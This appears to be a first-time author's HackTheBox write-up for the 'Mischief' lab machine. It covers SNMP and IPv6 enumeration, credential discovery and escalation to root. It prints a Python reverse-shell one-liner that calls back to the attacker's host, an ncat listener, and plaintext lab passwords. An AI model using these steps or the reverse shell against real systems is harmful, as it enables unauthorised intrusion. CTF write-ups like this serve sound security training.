Machine Profile

This is one of my favorite Machine. And it’s my first CTF & HackTheBox write-up. If you read this please give me feedback, How was the write-up. Give me some suggestion. It will help me to write a good write up. Let’s start the write-up.

First thing first. We are going to run the NMAP scan. :D

We have found two open ports, if we browse this URL we will get an authentication required login page.

URL: http://10.10.10.92:3366/

Now we will run another NMAP scan for UDP ports.

We found an open port SNMP service running.

If we run this command we will get the login credential.

Command: snmpwalk -c public -v 2c 10.10.10.92

We got the login credential.

Username: loki Password: godofmischiefisloki

Let’s go back to the URL & login with this credential.

After login with the above credential, we have got another credential. That means we have to find out another way to login with this new credential.

I always search every machine makers username on google for a clue. :3

And I found that same user develop SNMP IPv6 enumeration tool name Enyx. Interesting nah?

Enyx: https://github.com/trickster0/Enyx

Let’s enumerate with Enyx.

Command: python enyx.py 2c public 10.10.10.92

We have found the IPV6 address :)

Now let’s enumerate the IPV6 address with NMAP.

After running NMAP scan we can see that 22 & 80 ports are open.

Let’s browse the IPV6 address.

Now we have found another login page.

Let’s try to login this page with the credential we found before.

Username: loki Password: trickeryanddeceit

We can’t login here with this credential. Let’s use our common sense here.

Change the username loki to administrator.

We can successfully login with this credential,

Username: administrator Password: trickeryanddeceit

Let’s try for the reverse shell.

NCAT Listener: ncat -6 -lvnp 4444

Revers shell: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((“your-machines-ipv6-address”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Let’s upgrade our shell with this Python script.

Script: python -c ‘import pty; pty.spawn(“/bin/bash”);’

We got the reverse shell, but can not open the user.txt file. Well, no problem. We got another credential from /home/loki/credentials

Let’s open another terminal & login as loki via SSH.

Username: loki Password: lokiisthebestnorsegod

We got the user hash, now it’s time to get the root hash.

and we found the root password in .bash_history

Let’s go back to the www-data@Mischief terminal, coz only www-data has the rights to execute su command.

let’s run su & use this password lokipasswordmischieftrickery

Yay, we are root now

Wait, What!

Well, we are hacker. we know how to find it.

Let’ run the find command to find the root.

Yay, finally we found the root.txt

We did it!

Contact Me:

Twitter: https://twitter.com/TheShahzada

Github: https://github.com/theshahzada

HackTheBox: https://www.hackthebox.eu/profile/37502